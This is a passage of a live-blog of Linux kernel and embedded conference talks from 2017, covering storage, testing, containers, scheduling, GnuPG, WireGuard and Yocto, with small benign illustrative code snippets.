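        return max(matches)[1] if matches else None

    def accepts(self, public_key, source):
        """On receive, keep a packet only if its source maps back to the sender's key."""
        return self.peer_for(source) == public_key
```

The same table answers both questions: which key to encrypt with when sending, and whether a decrypted packet is allowed to claim its source address.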

In Wireguard, the interface appears stateless, while under the hood, session state, connections are handled transparently.

The key distribution between peers is left to userspace.

Wireguard works well with network namespaces. You can for example limit a container to only communicate through a wireguard interface.

As a design principle, wireguard has no parsing. It also won't interact at all with unauthenticated packets, making it un-scannable unless you have the proper peer private key.

Under the hood, it uses the Noise Protocol Framework (used by Whatsapp) by Trevor Perrin, with modern algorithms like Chacha20, Blake2s, etc. It lacks crypto agility, but supports a transition path.

To conclude, Jason says that Wireguard is the fastest, and lowest latency available VPN out there.

Modern Key Management with GPG

by Werner Koch

What's new

GnuPG 2.2 was released a few weeks ago, while 2.1 has been around for nearly 3 years. There's now easy key discovery going through key servers to search keys associated with an email address.

You can now use gpg-agent over the network, so that you don't have to upload your private keys to a server.

In the pipeline for version 2.3 is SHA2 fingerprinting, an AEAD mode, and new default algorithms. The goal is also to help upper applications integrate GPG in their projects. Werner says he also wants to make the Gnuk open hardware USB token easier to buy in Europe. Improving documentation is also planned.

GPG will be moving to ECC. While this is a well researched-field, some curves (specific ECC implementation) have a pretty bad reputation according to Werner, and some of those are required by NIST, or European standards. The new de-facto standard curves are Curve25519 and Curve448-Goldilocks.

An advantage of ECC key signatures is that they are much shorter than RSA signatures, and faster to compute for signing. Verification is slower though.

User experience

The command line interface is being improved with new --quick- options, that are simpler to use. There's now a quick command to generate a key, update the expiration time, add subkeys, update your email address (uid), revoke the old address, sign key, verify a key locally for key signing parties.

The main issue with key servers is that they can't map an address to a key. Anyone can publish a key with a given email. The proper way to handle this is through the email server, but this isn't solved yet. Werner's opinion is that the Web-of-Trust is a too complex tool, he believes that Trust On First Use (TOFU) is a better paradigm.

There are two GPG interfaces: one for humans, and one for scripting. You should always use the scripting one with your programs, as it's more stable.
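As an illustration of the scripting side, here is a small parser for the colon-separated listing format, as produced by something like `gpg --batch --with-colons --list-keys`. Picking `--with-colons` as the example is my assumption of what the scripting interface covers; the sample data is made up.

```python
def parse_colon_listing(text):
    """Extract primary-key fingerprints and user IDs from a colon listing."""
    keys = []
    for line in text.splitlines():
        fields = line.split(":")
        record = fields[0]
        if record == "pub":
            keys.append({"fingerprint": None, "uids": []})
        elif record == "fpr" and keys and keys[-1]["fingerprint"] is None:
            keys[-1]["fingerprint"] = fields[9]   # field 10 of an fpr record
        elif record == "uid" and keys:
            keys[-1]["uids"].append(fields[9])    # field 10 of a uid record
    return keys


# Made-up sample in the colon format (one primary key, one subkey)
SAMPLE = """\
pub:u:255:22:0123456789ABCDEF:1506470400:::u:::scESC:
fpr:::::::::AAAABBBBCCCCDDDDEEEEFFFF0123456789ABCDEF:
uid:u::::1506470400::HASH::Alice Example <alice@example.org>:
sub:u:255:18:FEDCBA9876543210:1506470400::::::e:
fpr:::::::::1111222233334444555566667777888899990000:
"""

keys = parse_colon_listing(SAMPLE)
```

Only the first `fpr` record after a `pub` line is kept, so the subkey fingerprint does not overwrite the primary one.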

There are now import/export filters in GPG to reduce the size impact of keys with lots of signatures.

You can now ssh-add keys into the gpg-agent. Only caveat, is that in this case, GnuPG is storing the key forever in its private key directory instead of just in memory.

In conclusion, GPG isn't set in stone, and it keeps improving and evolving. The algorithms, user interface, scriptability are getting better.

(That's it for today ! Continue reading on the last day !)

Kernel Recipes 2017 day 1 live-blog

2017-09-27T00:00:00+02:00

Following last year's attempt, I'm doing a live blog of Kernel Recipes 6th edition. There's also a live stream at Air Mozilla.

What's new in the world of storage for Linux

by Jens Axboe

Jens started with the status of blk-mq conversions: most drivers are now converted: stec, nbd, MMC, scsi-mq, ciss. There are about 15 drivers left, but Jens says it isn't over until floppy.c is converted, re-offering the prize he offered two years ago.

blk-mq scheduling was the only missing feature, in order to tag I/O request, have better flush handling, or help with scalability. To address this, blk-mq-sched was added in 4.11, with the "none" and "mq-deadline" algorithms. 4.12 saw the addition of BFQ and Kyber algorithms.

Writeback throttling is a feature to prevent overwhelming the device with requests, to keep peak performance high. It was inspired by the networking Codel algorithm. It was tested with io.go, and proven to improve latency tremendously on both NVMe and hard-drives.

IO polling helps getting faster completion times, but it has a high CPU cost. Hybrid polling was added, with predictive algorithms in the kernel to be able to wake up the driver just before the IO completes. The kernel tracks IO completion time, and just sleeps for half the mean, allowing both fast completion time, and less CPU load leading to better power management. This is configurable through sysfs, with the proper fd configuration. Results show that adaptive polling is comparable in completion times with active polling, but with half the CPU cost.
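The "sleep for half the mean" heuristic is simple enough to sketch. This is only a model of the idea described above, with hypothetical names; the kernel's bookkeeping is certainly more involved.

```python
class HybridPoller:
    """Track completion times and derive how long to sleep before polling."""

    def __init__(self):
        self.count = 0
        self.total_us = 0.0

    def record(self, completion_us):
        """Account for one completed IO."""
        self.count += 1
        self.total_us += completion_us

    def sleep_before_poll_us(self):
        """Half the mean completion time; 0 means poll right away."""
        if self.count == 0:
            return 0.0
        return (self.total_us / self.count) / 2
```

With completions around 100 µs, the submitter would sleep about 50 µs and only then start burning CPU on polling.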

Faster O_DIRECT and Faster IO accounting were also worked on. IO accounting used to be invisible in profiling, but with the huge scaling efforts of the IO stack, it started showing at 1-2% in testing. In synthetic tests, disabling iostat started improving performance greatly. It was rewritten and merged in 4.14.

A new mechanism called Write lifetime hints allows application to signal expected write lifetime with fcntl. It allows giving hint to flash based storage (supported in NVMe 1.3), of the total size of the write, making sure you won't get such a big write amplification associated with the internal Flash Translation Layer (FTL), when you do big writes. The device might make more intelligent decisions, better garbage collection internally. It showed improvements with RocksDB benchmarks.
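From userspace, setting such a hint is a single fcntl call. The sketch below hard-codes the command and hint values as I remember them from the kernel's `linux/fcntl.h`; treat them as assumptions and check them against your headers. The call is expected to fail on kernels or platforms without the feature, which the helper reports as `False`.

```python
import fcntl
import struct

# Assumed values, copied from memory of include/uapi/linux/fcntl.h
F_SET_RW_HINT = 1024 + 12
RWH_WRITE_LIFE_SHORT = 2
RWH_WRITE_LIFE_LONG = 4


def hint_argument(hint):
    """The fcntl takes a pointer to a 64-bit integer holding the hint."""
    return struct.pack("Q", hint)


def set_write_lifetime(fd, hint):
    """Tag the file behind fd; returns False if the kernel refuses the hint."""
    try:
        fcntl.fcntl(fd, F_SET_RW_HINT, hint_argument(hint))
        return True
    except OSError:
        return False
```

A database could, for instance, tag its write-ahead log as short-lived and its compacted data files as long-lived.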

IO throttling was initially tied to CFQ, which isn't ideal with the new blk-mq framework. It now scales better on SSDs, supports cgroup2, and was merged for 4.10.

Jens came back to a slide from Kernel Recipes 2015 where he predicted the future work, and all the features previously discussed in this talk were completed in the two-year timespan.

In the future, IO determinism is going to be a focus of work, as well as continuous performance improvements.

Testing on device with LAVA

by Olivier Crête

Continuous integration is as simple as "merge early, merge often" Olivier says. But the core of the value is more in Continuous Testing, and that's what most people think when they say CI.

Upstream kernel code is properly reviewed, so why should it be tested, Olivier asked. Unfortunately, arm boards aren't easy to test, so the kernel used to rely on users to do the testing.

That's until kernelci.org came along, doing thousands of compiles and boots every day, catching a lot of problems. kernelci.org is very good at breadth of testing, but not depth. If you have any serious project, you should do your own testing, with your own hardware and patches.

Unfortunately, automation isn't ubiquitous, because the perceived value is low compared to cost. To overcome this, the first thing to have is a standardized build, single click build system, with no manual operation. The build infrastructure should be the same for everyone, and Olivier recommends using docker images.

The second step is to close the CI loop, which is sending automated messages to the developer on failure as soon as possible. Public infrastructure in Gitlab, github or phabricator have support for CI, as well as blocking merging of anything that breaks the build.

LAVA

Linaro Automation and Validation Architecture (LAVA) is not a CI system. It just focuses on board management, making testing them easier. It can install images, do power control, supports serial, ssh, etc. It's packaged for Debian and has docker images available. It should be combined with CI system like Jenkins.

The first thing to have is a way to power a board on and off. You can find various power switch relay boards from APC, Energenie, devantech, or even other USB relays.

LAVA supports different bootloaders: u-boot, fastboot, and others. The best strategy is to configure the bootloader for network booting.

Lava is configured with a jinja2 template format, where you set various variables for the commands you need to connect to, reset, power on/off the board.

Tests are defined by YAML files, and can be submitted directly through the API or via command line tools like lava-tool, lqa, etc. You specify the name of the job, timeouts, visibility, priority, and a list of actions to do.
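To give an idea of the shape of such a job, here is a sketch that builds one as a Python dictionary and prints it as JSON (which YAML parsers also accept). The top-level key names are from my recollection of the LAVA job format and should be treated as assumptions; the board type and the contents of the actions are placeholders.

```python
import json

# Fields listed in the talk; key spelling assumed from the LAVA job format
REQUIRED = ("job_name", "timeouts", "visibility", "priority", "actions")


def make_job(name, device_type, actions, minutes=10):
    """Build a job description with the fields mentioned above."""
    return {
        "job_name": name,
        "device_type": device_type,   # hypothetical board type
        "timeouts": {"job": {"minutes": minutes}},
        "visibility": "public",
        "priority": "medium",
        "actions": actions,
    }


def missing_fields(job):
    """List the required top-level fields absent from a job description."""
    return [key for key in REQUIRED if key not in job]


job = make_job("boot-smoke-test", "my-board",
               [{"deploy": {"to": "tftp"}}, {"boot": {"method": "u-boot"}}])
print(json.dumps(job, indent=2))
```

Generating jobs from code like this makes it easy for a CI system to submit one job per board and per build.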

Conclusion

You should do CI, Olivier says. It requires a one-time investment, and saves a lot of time in the end. According to Olivier, from nothing, a LAVA+Jenkins setup is at most two days of work. Adding a new board to an infrastructure, is done in one or two hours.

Container FS interfaces

by James Bottomley

James started with an introduction on virtualization and hypervisor OSes. Within Linux, there are two hypervisor OSes: Xen and kvm. Both use Qemu to emulate most devices, but they differ in approach. Xen introduced para-virtualization, modifying the OS to enhance emulation. But hardware advancements killed para-virt, except in a few devices. In James' opinion, the time lost in working with paravirt in Linux made it lose the enterprise virtualization market to VMWare.

Container "guests" just run on the same kernel: there is one kernel that sees everything. The disadvantage is that you can't really run Windows on Linux.

The container interface is mostly cgroups and namespaces. There are label-based namespaces, the first one being the network namespace. There are mapping namespace, mapping some resources to somewhere else, allowing those to be seen differently, like the PID namespace, which can map a given PID on the host to be PID 1 inside the container.

Containers are used in Mesos, LXC, docker, and they all use the same cgroups and namespaces standard kernel API. There are many sorts of cgroups (block IO, CPU, devices, etc.), but they aren't a focus of the talk. James intends to focus on namespaces instead.

James claims that you don't need any of the "user-friendly" systems, and you can just use the clone, unshare, and standard kernel syscall API to configure namespaces.

Namespaces

User namespaces are what ties it all together, allowing you to run as root inside a contained environment. When you buy a machine in the cloud, you expect to run stuff on it as root. Since they give enhanced privileges to the user, the user namespaces were unfortunately the source of a lot of exploits, although there hasn't been any serious security breach since 3.14, James said.

User namespaces also map uids; in Linux, the shadow-utils provides a newuidmap and newgidmap for this. The user namespace hides unmapped uids, so they are inaccessible, even to "root" in the namespace. This creates an issue since a container image will mostly have the files with uid 0, which then should be mapped to the real kuid, and the fsuid across the userspace/kernel/storage boundary.
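The mapping itself is visible in /proc/PID/uid_map, one range per line: first uid inside the namespace, first uid outside, and the length of the range. A small sketch of the translation, with helper names of my own:

```python
def parse_uid_map(text):
    """Parse uid_map lines: <first id inside> <first id outside> <count>."""
    return [tuple(int(x) for x in line.split())
            for line in text.splitlines() if line.strip()]


def to_host_uid(uid_map, inside_uid):
    """Translate a uid seen in the namespace to the host uid, or None if unmapped."""
    for inside, outside, count in uid_map:
        if inside <= inside_uid < inside + count:
            return outside + (inside_uid - inside)
    return None


# Typical-looking mapping: "root" in the container is uid 100000 on the host
uid_map = parse_uid_map("0 100000 65536\n")
```

A uid that falls outside every range has no host counterpart, which is why such files stay inaccessible even to "root" in the namespace.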

In kernel 4.8, the superblock namespace was added to allow plugging a usb key or running a FUSE driver in a container. But to be useful, you need a superblock, which isn't useful with bind maps, because you only have one superblock per underlying device.

The mount namespace works by cloning the tree of mounts when you do unshare --mount; at first it's identical to the original one, but once you modify it it's different. But, all the modified mounts point to the same refcounted super_block structure. It might create issues when you add new mounts inside a sub-namespace, then this locks the other refcounted super_blocks from the host until you can umount the new mount, like the usb key you plugged in your container, that completely locks the mount namespace trees.

James then did a demo, showing with unshare that if you first create a user namespace, you can then create mount namespaces, despite being unable to do it before entering the user namespace. It shows how you can elevate your privileges with user namespaces, despite not being root, from an outside view.

It was then shown how you can create a file that is really owned by root by manipulating the mount points inside the user/mount namespace by using marks with shiftfs.

shiftfs isn't yet upstream, and other alternatives are being explored to solve the issues brought by the container world.

Refactoring the Linux kernel

by Thomas Gleixner

The main motivation for Thomas' refactoring over the years was to get the RT patch in the kernel, and to get rid of the annoyances.

CPU Hotplug

One of his pet peeves is the CPU hotplug infrastructure. At first, the notifier design was simple enough for the needs, but it had its quirks, like the uninstrumented locking evading lockdep, or the obscure ordering requirements.

While CPU hotplug was known to be fragile, people kept applying duct tape on top of it, which just broke down when the RT patch started adding hotplug support. After ten years, in 2012, Thomas attempted to rewrite it but ran out of spare time. He picked it up again in 2015 and it was finalized in 2017.

It started by analysing all notifiers, and adding instrumentation and documentation in order to make the ordering requirements explicit. Then, one by one, the notifiers were converted to states.
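The difference between notifiers and states is easier to see in code. In the sketch below (my own simplification, with hypothetical names), each state has an explicit position plus a startup and a teardown callback; bringing a CPU up walks the states in order, and taking it down walks them in reverse. It assumes all states are registered before the first bring-up.

```python
class HotplugStateMachine:
    """Ordered states with startup/teardown callbacks, walked up or down."""

    def __init__(self):
        self.states = []    # (order, name, startup, teardown)
        self.current = 0    # number of states currently brought up

    def register(self, order, name, startup, teardown):
        self.states.append((order, name, startup, teardown))
        self.states.sort(key=lambda s: s[0])

    def bring_up(self):
        """Run the startup callbacks of the remaining states, in order."""
        for _, name, startup, _ in self.states[self.current:]:
            startup(name)
            self.current += 1

    def take_down(self):
        """Run the teardown callbacks of the active states, in reverse order."""
        for _, name, _, teardown in reversed(self.states[:self.current]):
            teardown(name)
            self.current -= 1
```

With notifiers, this ordering only existed implicitly in priorities and registration order; here it is a property anyone can read off the table.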

The biggest rework was that of the locking. Adding lockdep coverage unearthed at least 25 deadlock bugs, and running Steven Rostedt's cpu-hotplug stress test tool could find one in less than 10 minutes. Answering a question from Ben Hutchings in the audience, Thomas said that these fixes are unfortunately very hard to backport, leaving old kernels with the races and locks.

The lessons learned are that if you find a bug, you are expected to fix it. Don't rely on upstream to do that for you. There's a lot of bad code in the kernel, so don't assume you've seen the worst yet. You also shouldn't give up if you have to rewrite more things. Estimation in this context is very hard, and the original estimation of the task was off by a factor of three. In the end, the whole refactoring took 2 years, with about 500 patches in total.

Timer wheel

Its base concept was implemented in 1997, and extended over time. It was initially the base for all sorts of timers, and has been used mostly for timeouts since 2005.

Those timeouts aren't triggered most of the time, but re-cascading them caused a lot of performance issues for timers that would get canceled immediately after re-cascading. This is a process that holds a spin-lock with interrupts disabled, and therefore very costly.

It took a 3-month effort to analyze the problem, then 2 months for a design and POC phase, followed by 1 month for the implementation, posting and review process. Some enhancements are still in-flight.

The conversion was mostly smooth, except for a userspace visible regression that was detected 1 year after the code was merged upstream.

The takeaway of this refactoring is to be prepared to do palaeontological research; don't expect anyone to know anything, or even care. And finally, be prepared for late surprises.

Useful tools

Git is the absolute necessary tool for this work, with grep/log and blame. And if you need to dig through historical code, use the tglx/history merged repository.

Coccinelle is also very useful, but it's a bit hard to learn and remember the syntax.

Mail archives are very useful, but they need to be searchable, as well as quilt, ctags, and of course a good espresso machine.

In the end, this isn't for the faint of heart says Thomas. But it brings a lot of understanding on kernel history. It also gives you the skill to understand undocumented code. The hardest part is to fight the "it worked well until now" mentality. But, it is fun, for some definition of fun.

What's inside the input stack ?

by Benjamin Tissoires

Why talk about input, isn't it working already, Benjamin asked. But the hardware makers are creative, and keep creating new devices with questionable designs.

The usages keep evolving as well, with the ubiquitous move to touchscreen devices for example.

Components

The kernel knows about hardware protocols (HID), talks over USB, and sends evdev events to userspace.

libinput was created on top of libevdev "because input is easy"; but it keeps being enhanced after three years, showing the simplicity of the task. It handles fancy things like gestures.

The toolkits use libevdev, but they also handle gestures because of different touchscreen use cases.

On top of that, the apps use toolkits.

The good, bad and ugly

Keyboards are mostly working, so it's good. Except for that Caps Lock LED in a TTY being broken since UTF-8 support isn't in the kernel.

Mice are old too, so they are a solved problem. Except for those featureful gaming mice, for which the libratbag project was created to configure all the fancy features.

Most touchpads are still using PS/2, but extending the protocol to add support for more fingers. On Windows, the touchpads communicate over i2c (in addition to PS/2). Sometimes the i2c enumeration goes through PS/2, but other times through UEFI.

Security

There were a few security issues, with an issue on Chromebook where they allowed the webapp to inject HID events through the uhid driver, and this enabled exploiting a buffer overflow in the kernel.

In 2016, the MouseJack vulnerability enabled remotely hacking wireless mice, which meant you could remotely send key events to a computer. You could also force a device to connect to your receiver. A receiver firmware update was pushed through GNOME Software for Logitech mice.

Linux Kernel Release Model

by Greg Kroah-Hartman Slides

While the kernel has 24.7M lines of code in more than 60k files, you only run a small percentage of that at a given time. There's a lot of contributors, and a lot of changes per hour. The rate of change is in fact accelerating.

This is something downstream companies don't realize. They're getting behind faster than ever when not working with upstream.

The release model is now that there's a new release every 2 or 3 months. All releases are stable. This time-based release model works really well.

The "Cambridge Promise" is that the kernel will never break userspace. On purpose. This promise was formalised in 2007, and kept as best as possible.

Version numbers mean nothing. Greg predicts that every 4 years, the first number will be incremented, so we might see Linux 5.0 in 2019.

The stable kernels are branched after each release. They have publicly documented rules for what is merged; the most important one is that a patch has to be in Linus' tree.

Longterm kernels are special stable versions, selected once a year, that are maintained for at least 2 years. This rule is now even applied by Google for every future Android device. This makes Greg think he might want to maintain some of those kernels for a longer time. Since people care, the longterm kernels also have a higher rate of bugfixes.

Greg says you should always have a mechanism to update your kernel (and OS). What if you can't ? Blame your SoC provider. He took for example a Pixel phone, where there's a 2.8M-line patch on top of mainline, for a total of 3.2M lines of running code. That means 88% of the running code (2.8M out of 3.2M lines) isn't reviewed. It's very hard to maintain and update.

Greg's stance is that all bugs can eventually be a "security" issue. Even a benign fix might become a security fix years later once someone realizes the security implications. Which is why you should always update to your latest stable kernel, and apply fixes as soon as possible.

In conclusion, Greg says to take all stable kernel updates, and enable hardening features. If you don't use a stable/longterm kernel, your device is insecure.

Lightning talks

Fixing Coverity Bugs in the Linux Kernel

by Gustavo A. R. Silva

Coverity is a static source code analyzer. There are currently around 6000 issues reported by the tool for the Linux kernel; those are sorted in different categories.

The first category is illegal memory access, followed by the medium category.

Gustavo first worked on a missing break in a switch in the usbtest driver. He first sent a patch to fix the issue, then a second one to refactor the code following advice from the maintainer.

Then he worked on arguments sent in the wrong order in scsi drivers. Following was an uninitialized scalar variable, and others. Gustavo showed many examples with obvious commenting or logic bugs.

Tracking exactly which bugs were fixed was really useful to take note of similar issues. He sent in total more than 200 patches in three months, in twenty-six different subsystems.

Software Heritage: Our Software Commons, Forever

by Nicolas Dandrimont

Open Source Software is important, Nicolas says. Its history is part of our heritage.

Code disappears all the time, whether maliciously, or when a service like Google Code is shut down.

Software Heritage is an open project to preserve all the open source code ever available. The main targets are VCS repositories, and source code releases. Everything is archived in the most VCS-agnostic data model possible.

The project fetches the source code from many sources, and then deduplicates it using a Merkle tree. There are currently 3.7B source files from 65M projects. It's already the richest source code archive available, and growing daily.
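
To make the deduplication idea concrete, here is a minimal sketch of content-addressed storage in shell. It is not Software Heritage's actual implementation: the store_blob function, the objects/ directory layout and the choice of SHA-256 are all assumptions made for illustration. Each file is stored under the hash of its content, so identical files fetched from different projects end up as a single object.

```shell
#!/bin/bash
# Hypothetical content-addressed store: not Software Heritage's real code.
# Each blob is saved once, under the SHA-256 of its content.
store_blob() {
    local src=$1 store=$2 hash
    hash=$(sha256sum < "$src" | cut -d' ' -f1)
    mkdir -p "$store"
    # Only copy when this content has never been seen before.
    [ -e "$store/$hash" ] || cp "$src" "$store/$hash"
    echo "$hash"
}

# Demo: two projects ship the same file, a third ships a different one.
demo=$(mktemp -d)
printf 'int main(void) { return 0; }\n' > "$demo/project-a.c"
printf 'int main(void) { return 0; }\n' > "$demo/project-b.c"
printf 'int main(void) { return 1; }\n' > "$demo/project-c.c"
for f in "$demo"/project-*.c; do
    store_blob "$f" "$demo/objects" > /dev/null
done
# Three files were ingested, but only two distinct objects are stored.
object_count=$(ls "$demo/objects" | wc -l | tr -d ' ')
echo "stored objects: $object_count"
```

In a Merkle tree, directories are in turn identified by hashing the identifiers of their children, so the same deduplication extends from single files to whole trees.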

How do you store all of this on a limited budget (100k€ for hardware) ? It all fits in a single (big) machine. The metadata is stored in PostgreSQL, the files are in filesystems. XFS was selected, and they hit the bottlenecks pretty quickly.

They are thinking of moving to a scale-out object storage system like Ceph. The project wants to lower the bar for anyone wanting to do the same thing. They also have plans to use more recent filesystem features.

Software Heritage is currently looking for contributors and sponsors for this project.

(That's it for day 1! Continued on day 2 and day 3!)

Embedded Recipes 2017 notes

2017-09-26T00:00:00+02:00

Following last year's attempt, I'm doing a live blog of Embedded Recipes 1st edition.

Understanding SCHED_DEADLINE

by Steven Rostedt

Every task starts as SCHED_OTHER, where each task gets a fair share of the CPU bandwidth.

Then comes SCHED_FIFO, where it's first in, first out: a task will run until it gives up the CPU. SCHED_RR shouldn't be used, Steve said, because it only works between tasks of the same priority.

Steve gave an example of a machine that runs two tasks, one of a nuclear power plant, and one of a washing machine. The point is to show that priorities should be thought of in a system-wide view when using Rate Monotonic Scheduling (RMS). It's not as simple as which task is most important.

Earliest Deadline First (EDF)

Earliest deadline first solves some of the issues of RMS, by allowing task sets that RMS cannot schedule to run without missing deadlines.
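
As a rough illustration of the difference, the sketch below compares a hypothetical two-task set against the classic sufficient utilization bound for rate-monotonic scheduling, n(2^(1/n) - 1), and against the EDF limit of 1 on a single CPU. The task values are made up for the example and are not from Steve's slides; deadlines are assumed equal to periods.

```shell
#!/bin/bash
# Hypothetical task set, one "runtime period" pair per line (same time unit).
tasks='2 5
4 7'

# Compare total utilization with the Liu & Layland RMS bound and the EDF limit.
check_utilization() {
    awk '
    { u += $1 / $2; n++ }
    END {
        rms_bound = n * (2 ^ (1 / n) - 1)
        printf "utilization=%.3f rms_bound=%.3f\n", u, rms_bound
        print "rms_guaranteed=" (u <= rms_bound ? "yes" : "no")
        print "edf_schedulable=" (u <= 1 ? "yes" : "no")
    }'
}

printf '%s\n' "$tasks" | check_utilization
```

The RMS bound is only a sufficient test, but this particular set really does fail under fixed priorities: preempted twice by the shorter-period task, the second task needs 8 time units to complete its 4 units of work, against a deadline of 7.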

Steve explained that sched_yield should never be used because it's almost always buggy. Except when using SCHED_DEADLINE of course, where it can be useful.

Multi processors

Steve then introduced a simple example to show Dhall's effect. It shows that, even on multiple processors, plain global EDF can't guarantee deadlines for a utilization over 1.
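
The classic construction behind Dhall's effect can be checked with a little arithmetic. The sketch below assumes a hypothetical 4-CPU machine with four light tasks and one heavy task, all released at time 0 with deadlines equal to their periods; the numbers are illustrative, not taken from the talk.

```shell
#!/bin/bash
# Hypothetical task set in microseconds (illustrative values only).
cpus=4
light_runtime=2;    light_period=1000   # one light task per CPU
heavy_runtime=1000; heavy_period=1001   # a single heavy task

dhall_effect() {
    # Global EDF runs the earliest deadlines first: the light tasks
    # (deadline 1000) occupy every CPU before the heavy one (deadline 1001).
    local heavy_start=$light_runtime
    local heavy_finish=$((heavy_start + heavy_runtime))
    awk -v m="$cpus" -v lr="$light_runtime" -v lp="$light_period" \
        -v hr="$heavy_runtime" -v hp="$heavy_period" \
        'BEGIN { printf "total utilization: %.3f of %d CPUs\n", m * lr / lp + hr / hp, m }'
    if [ "$heavy_finish" -gt "$heavy_period" ]; then
        echo "heavy task finishes at $heavy_finish, deadline $heavy_period: missed"
    else
        echo "heavy task finishes at $heavy_finish, deadline $heavy_period: met"
    fi
}

dhall_effect
```

Making the light tasks shorter and the heavy task's period correspondingly tighter keeps the deadline miss while pushing the total utilization arbitrarily close to 1, however many CPUs are available.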

If you want to partition EDF, it becomes similar to the bin packing problem, which is NP-complete. A solution is to use global EDF, which constrains the problem, but can solve a special case, and reach a utilization above 1 when using multiple processors.

The limits of SCHED_DEADLINE

It has to run on all CPUs.

It cannot fork, because the tasks have been fixed.

It's very hard to calculate the worst case execution time (WCET), and if you get it wrong, it breaks.

Using cgroups, it's possible to configure SCHED_DEADLINE affinity, but it still takes a long series of commands and some fiddling in /proc; this is being worked on, Steve says.

It's possible to use Greedy Reclaim of Unused Bandwidth (GRUB) in order to utilize bandwidth left by some tasks, leaving more leeway to deal with WCET.

Proper APIs to HW video accelerators

by Olivier Crête

There are various types of codecs: software, hardware, and then hardware accelerators. The last ones are the subject of Olivier's talk.

Codecs can be used in a variety of contexts: players, encoders, streamers, transcoders, VoIP systems, content creation software, etc.

The different use cases have different requirements: broadcast production wants high quality, while user-generated content will have lower quality, for example.

Video calls care mostly about latency. When transcoding, you might care about latency if you're live, or about quality per bit if you want to store it.

Requirements

Exchange formats on the encoded side might need to support variance in packetization, byte stream, etc.

The raw content might have different subsampling, color space, etc.

Then, the memory layout might vary as well: is it packed (RGBRGBRGB) or planar (RRRGGGBBB) ? Are there multiple planes (multiple DMAbuf fds) ? Do you have alignment requirements in memory ? You might have tiled formats, with different tile layouts, compressed in-memory formats, padding, etc.
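
As a small illustration of the two layouts, this sketch rearranges a packed buffer, where the components of each pixel are interleaved, into a planar one, where each component has its own contiguous plane. The sample labels and the function name are made up for the example; a real buffer would hold bytes, with the stride and alignment constraints mentioned above.

```shell
#!/bin/bash
# Convert a packed (interleaved) pixel buffer into three planes.
# Samples are given as whitespace-separated labels, three per pixel.
packed_to_planar() {
    awk '{
        r = g = b = ""
        for (i = 1; i + 2 <= NF; i += 3) {
            r = r " " $i; g = g " " $(i + 1); b = b " " $(i + 2)
        }
        # Planes are emitted one after the other: all R, then all G, then all B.
        print substr(r g b, 2)
    }'
}

echo "R0 G0 B0 R1 G1 B1 R2 G2 B2" | packed_to_planar
```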

The memory allocation can be internal or external. In Linux, you mostly care about DMAbuf.

There might be attached metadata: per-frame, like timestamps or Vertical Ancillary Data (VANC) such as AFD; or inter-frame, like SCTE-35/104 for ad insertion points.

A good API, Olivier says, should support push or pull modes for different uses. A good API should be a living, maintained project, with Open Source code as opposed to being just a specification.

Existing (wrong) solutions

OpenMAX IL is everywhere because it's required by Android. But no one implements the full OpenMAX, only the Android subset, validated through CTS. The spec isn't maintained at Khronos anymore, and the last library passing the full test suite was from 2011. It's a fragmented landscape.

OpenMAX has a specific threading and allocation model. The whole framework isn't a good API according to Olivier.

libv4l is a "transparent" wrapper over the kernel API, but it's tied to the kernel API rules, and has limited maintenance, Olivier says.

VA-API is more interesting, albeit Intel-specific. Still, it requires complex code, and is video-only.

GStreamer is a whole multimedia framework, with a specific way of working (threads, allocation, etc.), not a HW acceleration API. It's not designed for low latency.

FFmpeg/libav is kind of OK, Olivier says, but is not focused on the hardware side. MFT on Windows is close to what Olivier is seeking, but tied to Windows.

Simple Plugin API (SPA)

This library, coming from PipeWire, matches all of Olivier's requirements: no pipeline, no framework, registered buffers, synchronous or asynchronous modes, externally-provided thread contexts, and not limited to codecs.

It's available on github:

https://github.com/PipeWire/pipewire/tree/master/spa

It can work outside PipeWire, although it hasn't been picked up elsewhere yet.

Introduction to the Yocto Project - OpenEmbedded-core

by Mylène Josserand

Why use a build system ?

There are many constraints to meet in embedded systems. You can try building everything manually, but despite the flexibility, it's a dependency hell, and lacks reproducibility. Binary distributions are less flexible, harder to customize, and not available on all architectures.

A build system like Buildroot or Yocto is a middle ground between the two.

In Yocto, you have multiple tasks to download, configure, compile and install the builds. The tasks are grouped in recipes, and you manage recipes with Bitbake.

Many common tasks are already defined in the OpenEmbedded core. Many recipes are available, organised in layers.

OpenEmbedded is co-maintained by the Yocto Project and OE project. It's the base layer, the core of all the magic as Mylène says.

Workflow

Poky is a distribution built on top of the OpenEmbedded Core, and provides Bitbake.

The general workflow is Download -> Configure -> Compile. You download the proper version you want with git clone.

To add applications, add layers (collections of recipes). These are folders in your poky directory. Always look at existing layers before creating a recipe. Do not edit upstream layers if you don't want breakage when updating.

To configure the build, you first source the Bitbake environment, which moves you to a build folder, and gives you a set of commands in order to do the build. You can then edit the local.conf to set your MACHINE, which describes the hardware and can be found in specific BSP layers, and set up your DISTRO, which represents top-level configuration that will be applied on every build, and brings toolchains, libc, etc. Finally, the IMAGE brings the apps, libs, etc.

Creating a layer

When needed, you might create a layer, whether you have custom hardware, or want to integrate your own application. You can do that with the yocto-layer tool which does the heavy lifting. It's a good practice to create multiple layers to share common tasks/recipes between projects.

Recipes are created in .bb files, the format that bitbake understands. The naming of the file is application-name_version.bb, and a file is split in header, source, and tasks parts.

Mylène says it's a good practice to always use remote repositories to host app sources to make development quicker. App sources should never be in the layer directly. The folder organization should always be the same in order to find the recipes faster.

Sometimes, you might want to extend an existing recipe, without modifying it. It's possible with the Bitbake engine, when creating .bbappend files. All .bbappend files are version specific. They can be used to add patches, or customize the install process by appending a task.

Creating an image

An image is a top-level recipe. It has the same format as other recipes, with specific variables on top, like IMAGE_INSTALL to list the included packages, or IMAGE_FSTYPES for the binary format of images you want (ext4, tar, etc.).

It's a good practice to only install what you need for your system to work.

Creating a machine

The machine describes the hardware. It contains variables related to the architecture, like TARGET_ARCH for the architecture, or KERNEL_IMAGETYPE.

Mainline Linux on AmLogic SoCs

by Neil Armstrong

The AmLogic SoC Family has multimedia capabilities, and is used in many products. They have different products, ranging from Cortex-A9 to Cortex-A53 CPUs.

The SoCs are very cheap at ~7$ when compared to competitors.

Amlogic SoCs are used in many different cheap Android boxes. They are also in community boards from ODroid, the Khadas VIM1/2, NanoPi K2 or Le Potato which has been designed by BayLibre.

The Libre Computer board has been backed on Kickstarter. Mainline support is done by BayLibre, with many peripherals already working.

The upstream support started from 4.1 by independent hackers. From 4.7, BayLibre started working on it. The bulk of the work went in 4.10 and 4.12.

The work was concentrated on 64bit SoCs (the latest ones), but the devices are very similar inside the family.

Drivers so far

